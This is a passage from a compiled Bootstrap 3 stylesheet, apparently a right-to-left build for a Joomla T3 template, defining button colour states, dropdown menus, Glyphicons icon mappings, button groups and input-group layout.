fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #cc0000;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #800000;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-right: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-left: 4px solid transparent;
  border-right: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  right: 0;
  z-index: 1000;
  display: none;
  float: right;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: right;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  left: 0;
  right: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: 0;
  right: auto;
}
.dropdown-menu-left {
  left: auto;
  right: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  left: 0;
  right: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: 0;
    right: auto;
  }
  .navbar-right .dropdown-menu-left {
    left: auto;
    right: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: right;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-right: -1px;
}
.btn-toolbar {
  margin-right: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: right;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-right: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-right: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group {
  float: right;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-right: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-right: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  right: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: right;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
